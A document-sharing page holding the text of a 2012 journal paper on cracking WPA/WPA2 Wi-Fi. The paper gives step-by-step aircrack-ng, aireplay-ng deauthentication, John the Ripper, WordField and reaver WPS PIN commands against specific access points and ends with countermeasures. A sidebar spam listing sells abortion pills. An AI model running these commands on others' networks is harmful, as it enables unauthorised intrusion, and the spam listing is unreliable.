Volume 2-issue-6-2130-2138Volume 2-issue-6-2130-2138
Volume 2-issue-6-2130-2138Editor IJARCET
 
Volume 2-issue-6-2125-2129
Volume 2-issue-6-2125-2129Volume 2-issue-6-2125-2129
Volume 2-issue-6-2125-2129Editor IJARCET
 
Volume 2-issue-6-2114-2118
Volume 2-issue-6-2114-2118Volume 2-issue-6-2114-2118
Volume 2-issue-6-2114-2118Editor IJARCET
 
Volume 2-issue-6-2108-2113
Volume 2-issue-6-2108-2113Volume 2-issue-6-2108-2113
Volume 2-issue-6-2108-2113Editor IJARCET
 
Volume 2-issue-6-2102-2107
Volume 2-issue-6-2102-2107Volume 2-issue-6-2102-2107
Volume 2-issue-6-2102-2107Editor IJARCET
 

Más de Editor IJARCET (20)

Electrically small antennas: The art of miniaturization
Electrically small antennas: The art of miniaturizationElectrically small antennas: The art of miniaturization
Electrically small antennas: The art of miniaturization
 
Volume 2-issue-6-2205-2207
Volume 2-issue-6-2205-2207Volume 2-issue-6-2205-2207
Volume 2-issue-6-2205-2207
 
Volume 2-issue-6-2195-2199
Volume 2-issue-6-2195-2199Volume 2-issue-6-2195-2199
Volume 2-issue-6-2195-2199
 
Volume 2-issue-6-2200-2204
Volume 2-issue-6-2200-2204Volume 2-issue-6-2200-2204
Volume 2-issue-6-2200-2204
 
Volume 2-issue-6-2190-2194
Volume 2-issue-6-2190-2194Volume 2-issue-6-2190-2194
Volume 2-issue-6-2190-2194
 
Volume 2-issue-6-2186-2189
Volume 2-issue-6-2186-2189Volume 2-issue-6-2186-2189
Volume 2-issue-6-2186-2189
 
Volume 2-issue-6-2177-2185
Volume 2-issue-6-2177-2185Volume 2-issue-6-2177-2185
Volume 2-issue-6-2177-2185
 
Volume 2-issue-6-2173-2176
Volume 2-issue-6-2173-2176Volume 2-issue-6-2173-2176
Volume 2-issue-6-2173-2176
 
Volume 2-issue-6-2165-2172
Volume 2-issue-6-2165-2172Volume 2-issue-6-2165-2172
Volume 2-issue-6-2165-2172
 
Volume 2-issue-6-2159-2164
Volume 2-issue-6-2159-2164Volume 2-issue-6-2159-2164
Volume 2-issue-6-2159-2164
 
Volume 2-issue-6-2155-2158
Volume 2-issue-6-2155-2158Volume 2-issue-6-2155-2158
Volume 2-issue-6-2155-2158
 
Volume 2-issue-6-2148-2154
Volume 2-issue-6-2148-2154Volume 2-issue-6-2148-2154
Volume 2-issue-6-2148-2154
 
Volume 2-issue-6-2143-2147
Volume 2-issue-6-2143-2147Volume 2-issue-6-2143-2147
Volume 2-issue-6-2143-2147
 
Volume 2-issue-6-2119-2124
Volume 2-issue-6-2119-2124Volume 2-issue-6-2119-2124
Volume 2-issue-6-2119-2124
 
Volume 2-issue-6-2139-2142
Volume 2-issue-6-2139-2142Volume 2-issue-6-2139-2142
Volume 2-issue-6-2139-2142
 
Volume 2-issue-6-2130-2138
Volume 2-issue-6-2130-2138Volume 2-issue-6-2130-2138
Volume 2-issue-6-2130-2138
 
Volume 2-issue-6-2125-2129
Volume 2-issue-6-2125-2129Volume 2-issue-6-2125-2129
Volume 2-issue-6-2125-2129
 
Volume 2-issue-6-2114-2118
Volume 2-issue-6-2114-2118Volume 2-issue-6-2114-2118
Volume 2-issue-6-2114-2118
 
Volume 2-issue-6-2108-2113
Volume 2-issue-6-2108-2113Volume 2-issue-6-2108-2113
Volume 2-issue-6-2108-2113
 
Volume 2-issue-6-2102-2107
Volume 2-issue-6-2102-2107Volume 2-issue-6-2102-2107
Volume 2-issue-6-2102-2107
 

Último

A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusA Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusZilliz
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxRustici Software
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu SubbuApidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbuapidays
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfOverkill Security
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024The Digital Insurer
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 

Último (20)

A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusA Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source Milvus
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu SubbuApidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 

609 618

  • 1. ISSN: 2278 – 1323 International Journal of Advanced Research in Computer Engineering & Technology Volume 1, Issue 4, June 2012 WPA Exploitation In The World Of Wireless Network Pranav S. Ambavkar, Pranit U. Patil, Dr.B.B.Meshram, Prof. Pamu Kumar Swamy VJTI, Matunga, Mumbai, India. ambavkar.pranav@gmail.com Abstract—Wifi device uses security authentication that carry that name. IEEE 802.1X authentication protocol even though they are having some weakness. server uses, WPA, in which it provides different keys Generally wep, wpa protocols are used for security to each user. However, it can also be used in a less purpose. This is already proved that WEP secure "pre-shared key" (PSK) mode. authentication protocol is a weak protocol. By analyzing weakness of wep the concept of WPA and WPA2 Data is encrypted using the RC4 stream cipher, with developed. In this paper, we will examine the weak- a 128-bit key and a 48-bit initialization vector (IV). nesses of “Strong WPA/WPA2 Authentication” and see One major improvement in WPA over WEP is the how easy it is to crack the protocol. We will take a look Temporal Key Integrity Protocol (TKIP), which at the new standard’s WPA and WPA2 dynamically changes keys as the system is used. The implementations along with their first minor factor Key recovery is possible in WEP was removed vulnerabilities and how it is possible to crack it. in WPA by adding large IV in algorithm. Index Terms—WEP,WPA,WPA2,Aircrack-ng,John-the- ripper,wordfield,reaver WPA has highly secured payload integrity. The CRC used in WEP is not secured as it is possible to change I.INTRODUCTION CRC message during cracking even if WEP key is not known. A more secured algorithm named WEP,WPA and WPA2 are the authentication Message Integrity Code (MIC) is used in WPA to protocols are used for security of wireless network. overcome WEP weaknesses. Frame counter Researchers had found various weaknesses in WEP mechanism is used in MIC of WPA that prevents old system .To overcome that its place is taken by execution of repeated attacks. WPA and WPA2.Today world says that WPA and WPA2 are very strong protocols providing good C.WPA2 : security. First we will see the brief history of WEP,WPA and WPA2. There is very much similarities between A.WEP [1] : 802.11i/WPA2 authentication security WPA, with a few differences. It uses AES based algorithm.At the WEP protocol was not developed by researchers or end of the proposed 802.11i transition, AES experts in security and cryptography. So weakness encryption was put to use as hardware was upgraded was not considered in all direction. The name David to allow for the change. Wagner proved RC4 vulnerable. In 2001, Scott Fluhrer, Itsik Mantin and Adi Shamir published paper II. WPA/WPA2 WEAKNESSESS on WEP, showing two vulnerabilities in the RC4 encryption algorithm: invariance weaknesses and Weaknesses of WPA/WPA2 has been discovered. known Initialization Vector(IV) attacks. Both attacks rely on the fact that for certain key values it is A. Weak password : possible for bits in the initial bytes of the key stream to depend on just a few bits of the encryption key. As the encryption key is nothing but concatenation of If client is connected to access point using weak secret key and IV, certain IV values yield weak keys. password then password cracking attacks are possible. WPA uses a password for accessing. When B.WPA : device is connected to access point with WPA Wifi Protected Access (WPA) was created by the password, its encrypted form is pass over network Wi-Fi Alliance, an industry trade group, which owns which is catch by someone who is listening it. the trademark to the Wi-Fi name and certifies devices Catching the data is not an issue but if encrypted 609 All Rights Reserved © 2012 IJARCET
  • 2. ISSN: 2278 – 1323 International Journal of Advanced Research in Computer Engineering & Technology Volume 1, Issue 4, June 2012 password captured by cracker is weak, small then by  Network card that supports packet using dictionary attack cracking is possible. injection, such as TP-link TL-WN821N adapter with atheros chipset B. WPS PIN recovery[2] : Dell INSPIRON 4050 laptop’s internal One of the most serious weakness is found in Network card is not supporting packet December 2011 by Stefan Viehbock that impact on injection function. So I am using TP-link wireless access point with the Wi-Fi Protected Setup TL-WN821N adapter with atheros chipset. It (WPS) feature, without knowing of which encryption shows wlan1 interface(Figure2). method they use. Todays there are many routers having this feature enabled by default. Wifi manufacturer had find out a new alternative method to eliminate weak password choices given by user. The feature generates automatically strong password and users should add their devices to desired network. The router has pushing button on the devices or entering an 8-digit PIN. The flaw in WPA PIN allows attacker to recover of PIN. Figure2: TP-link TL-WN821N adapter III. TOOLS NEEDED TO EXPLOIT WPA  Basic Linux networking skills and command line capabilities  Blackbuntu operating system  TP Link Access point whose wireless network encrypted with a WPA passphrase (Figure1) IV.Attacks on WPA A. Aircrack-ng against WPA[3]: Step 1 : Put the interface in monitor mode. Prepare to start dumping packets from targeted network. "airmon-ng start wlan1" where wlan1 is your network interface device. It enables wlan1 to monitor mode(Figure3). Figure : TP Link Access point 610 All Rights Reserved © 2012 IJARCET
  • 3. ISSN: 2278 – 1323 International Journal of Advanced Research in Computer Engineering & Technology Volume 1, Issue 4, June 2012 Figure3: airmon-ng start wlan1 Step 2 : Start capturing packets from targeted access Beacon frames, Data packets, channel, Encryption, point and be ready to deauthenticate a device cipher type and ESSID. After selecting network that connected to desired access point(Figure4). we want to crack note down the BSSID and channel number. Here I am going to crack access point whose “airodump-ng mon0” wait for some time to load all BSSID is F4:EC:38:BA:6C:44 and ESIID redot on networks available in range of lan card. Enter Ctrl+C channel 1. to stop scanning. It will show all details about desired access point. Such as connected BSSID, power, 611 All Rights Reserved © 2012 IJARCET
  • 4. ISSN: 2278 – 1323 International Journal of Advanced Research in Computer Engineering & Technology Volume 1, Issue 4, June 2012 Figure4: airodump-ng mon0 Step 3 : Monitor and store data passing through Assuming you still have a terminal window open network dumping traffic, open a new terminal and deauthenticate the victim from the target network. airodump-ng mon0 --channel 1 --bssid F4:EC:38:BA:6C:44 -w reddot. The data being Aireplay-ng -o 4 -a F4:EC:38:BA:6C:44 -c recorded and saved in reddot named file. 90:4C:E5:B2:6F:D8 mon0 Step 4 : Deauthenticate the device connected to where "-0 4" tells aireplay to inject deauthentication access point and force them to re exchange WPA packets (4 of them), "-a" is the wireless access point key(Figure5) MAC address and "-c" is the client (victim) MAC address. It will provide the 4-way handshake for us, once they are disconnected from the wireless access point. Figure5: Aireplay-ng A successful deauthentication attack will show Step 4 : Its time to confirm 4-way handshake is ACKs, which indicates that the victim who is captured or not(Figure6) : Now that you connected to the access point has acknowledged the deauthenticated a client from the wireless network, disconnect we just issued. It is possible to send just 1 that client will re-exchange the WPA key. Because deauthentication request, but depending on the range you have your terminal window still open and of you to the target wireless network sometimes more dumping traffic, you should have captured this than 1 request is needed. We chose to inject a handful handshake. of deauthentication requests to ensure that the vicim gets the message. Figure 6: 4-way handshake Airodump will show the captured handshake in the packet you need, you can close this window and top right hand corner. Now that you captured the proceed to break the WPA key. 612 All Rights Reserved © 2012 IJARCET
  • 5. ISSN: 2278 – 1323 International Journal of Advanced Research in Computer Engineering & Technology Volume 1, Issue 4, June 2012 Step 5 : To crack the password you need a file which aircrack-ng -w /home/pranav/download/password.lst contains list of password. Prepare your own –b F4:EC:38:BA:6C:44 /home/pranav/reddot-01.cap dictionary which contains all possible passwords that generally used. There are lot of dictionary files exits where "-w" specifies the dictionary file to use. on internet that can be used for demo cracking. Here I Compiled a file password.lst. Knowing what your This command will start trying the passwords listed password is for your own network, compile a in the dictionary file that you provided until it finds a dictionary file and include the real password match. If the password wasn’t found then you need to somewhere in the middle. use a better dictionary file. It is possible that the password can not be found at all in case it was long and complex enough! But in case there was a match then you should see something like : Step 6 : Cracking the WPA key using aircrack-ng, dictionary file and 4-way handshake captured file redot.cap(Figure7) Figure7: aircrack-ng The WPA or WPA2 password is what you see besides “KEY FOUND!” inside the brackets Step 1 : airmon-ng start wlan1 Step 2 : airodump-ng mon0 B.Crack WPA/WPA2-PSK with John the Ripper Step 3 : airodump-ng --channel 7 --write output -- [4]: bssid 00:17:9A:82:44:1B mon0 At the moment, we need to use dictionaries to brute force the WPA/WPA-PSK. To crack Step 4: aireplay-ng --deauth 4 -a 00:17:9A:82:44:1B - WPA/WPA2-PSK requires the to be cracked key is in c 90:4C:E5:B2:6F:D8 mon0 your dictionaries. I have a better solution to crack WPA/WPA2-PSK. Suppose the wifi channel is 5, the Step5: /pentest/password/john- BSSID MAC is 00:17:9A:82:44:1B and the client 1.7.6.jumbo12/run/john -stdout -incremantal:all | MAC is 90:4C:E5:B2:6F:D8. Make sure the client is aircrack-ng –b 00:17:9A:82:44:1B -w - connecting to the wifi router. /home/pranav/test-01.cap(Figure8) 613 All Rights Reserved © 2012 IJARCET
  • 6. ISSN: 2278 – 1323 International Journal of Advanced Research in Computer Engineering & Technology Volume 1, Issue 4, June 2012 Figure8: John the Ripper output You are required to wait for hours or years for the So running "wordfield -a -n 8 8" will output all cracking which is depends on how powerful your possible alphanumeric strings which are 8 characters hardwares are and strength of the key. long. I will be using the output from this tool as the input for aircrack-ng. C.Cracking WPA Without a Dictionary (Aircrack- ng + WordField)[5] : When a 4 way handshake has been saved with airodump-ng, the wpa network is now ready to crack. Instead of using a dictionary on a WPA encrypted This is usually where a dictionary attack will be network, we can perform a bruteforce attack. For key launched. But using this method, the dictionary will generation I will use a tool called WordField, which be generated in realtime against cracking the wpa can be found here.By using this tool we can crack key. key using bruteforce attack. This is the command to do this, Usage of this tool is very simple : wordfield -a -n 8 8 | aircrack-ng –b wordfield [OPTION...] MINLENGTH 00:17:9A:82:44:1B -w - /home/pranav/Wifire- [MAXLENGTH] 02.cap(Figure9) 614 All Rights Reserved © 2012 IJARCET
  • 7. ISSN: 2278 – 1323 International Journal of Advanced Research in Computer Engineering & Technology Volume 1, Issue 4, June 2012 Figure 9: WordField output This will pipe the output from wordfield into Using the terminal: aircrack-ng. Also, please note that this is only really effective on weak keys, unless you have a lot of 1. Download aircrack-ng : sudo apt-get install computational power. When I set a WPA key aircrack-ng aabbccdd it took 22 hours 7 minutes and 35 seconds.When tried for aaaabbbb took 2 minutes and 2. Put Wifi adapter into monitor mode : sudo airmon- 6 seconds. So cracking using wordfield depend upon ng start wlan1 your laptops processor speed and how much key is complicated as it tries all possible permutation 3. Use airodump-ng to scan for WPA/WPA2 combination. encrypted network BSSIDs : sudo airodump-ng mon0 D. How to crack WPA/WPA2 without a dictionary The BSSIDs are listed on the left, these are the IDs using reaver[6]: for the various surrounding networks. Pick one which is WPA/WPA2 and uses a Public Shared Key (PSK). The security of WPA/WPA2 network encryption is Don't close this terminal, open up a new terminal and now over. It no longer takes decades to crack. Their use this. brilliant team have found a weakness in WPA that 4. Use wash command as shown in Figure10 to scan lets an attacker bruteforce against Wifi Protected wps pin enabled nearest access points : sudo wash –i Setup (WPS) PINS in order to then recover the mon0 WPA/WPA2 key. We'll be using a tool which exploits this bug called reaver. I will take you through how this is done on a Linux machine 615 All Rights Reserved © 2012 IJARCET
  • 8. ISSN: 2278 – 1323 International Journal of Advanced Research in Computer Engineering & Technology Volume 1, Issue 4, June 2012 Figure10:Nearest wps supporting Access Points 5. sudo reaver -i mon0 -b -b "BSSID" = the router to crack. F4:EC:38:BA:6C:44(Figure11) -i mon0 = use the mon0 interface which is your wifi adapter in monitor mode. Figure11:Reaver attack 616 All Rights Reserved © 2012 IJARCET
  • 9. ISSN: 2278 – 1323 International Journal of Advanced Research in Computer Engineering & Technology Volume 1, Issue 4, June 2012 6. Now wait from around hours as it cracks the set a WPA key “Game0nBitch” combination of network key! It cracks a numeric WPS key in all alphanumeric key it took 16 hours 58 minutes and 25 possible ways and took less time as it tries all seconds to crack.(Figure 12) permutation combination for a numeric pin. When I Figure 12:WPA Exploitation using Reaver V. CONCLUSION [2]http://en.wikipedia.org/wiki/Wi- Fi_Protected_Access#WPS_PIN_recovery In this paper we learned WEP,WPA,WPA2 authentication protocols. Weak passwords and WPS [3]https://sites.google.com/site/clickdeathsquad/Hom Pin are the main flaws in authentication. We have e/cds-wpacrack seen two types of dictionary attack aircrack-ng, john- [4]http://samiux.blogspot.in/2010/04/howto-crack- the-ripper if the password is weak and two types of wpawpa2-psk-with-john.html Brute force attack wordfield and reaver if WPS PIN enabled router is in network. We have good [5]http://www.zer0trusion.com/2011/09/cracking- knowledge of how crackers can attack wireless wpa-without-dictionary.html networks that use weak WPA / WPA2 keys and the simple countermeasures that you can take to ensure [6]http://www.zer0trusion.com that it doesn't happen to you. With a strong, long, complex key, disabling WPS PIN and good security practices, a wireless LAN secured by WPA / WPA2 is definitely not an easy target. REFERENCES [1]Wi-Fi security – WEP, WPA and WPA2 Guillaume Lehembre 617 All Rights Reserved © 2012 IJARCET
  • 10. ISSN: 2278 – 1323 International Journal of Advanced Research in Computer Engineering & Technology Volume 1, Issue 4, June 2012 AUTHERS PROFILE : technical education and technology education . Pranav S. Ambavkar is a student of VJTI Matunga, Mumbai. He did his B.Tech. I.T. degree from Dr.B.A.T.university. He has published three papers. He has work experience as a software engineer in INFOSYS and Lecturer at Rajendra Mane College of Engineering. Pranit Patil is a student of VJTI Matunga, Mumbai. He did his B.Tech. Computer. degree from Dr.B.A.T.university. He has published three papers. Dr. B. B. Meshram is working as Professor in Computer Technology Dept., VJTI, Matunga, Mumbai. He is Ph.D. in Computer Engineering and has published international journal is 25, National journal is 1, international conference is 70 and national conference 39 papers to his credit. He has taught various subjects such as Object Oriented Software Engg., Network Security, Advanced Databases, Advanced Computer Network (TCP/IP), Data warehouse and Data mining, etc at Post Graduate Level. He has guided several projects at graduate and post graduate level. He is the life member of CSI and Institute of Engineers etc Mr. Pamu Kumar Swamy has done M.E. in I.T. degree ,B.E. in Electronics degree BSc in Physics. Over 20 years of experience in Information Technology Infrastructure management (IMS) as principal technical consultant for major commercial open systems and open source systems, data storage, LAN/WAN/WLAN networks, IT security , 618 All Rights Reserved © 2012 IJARCET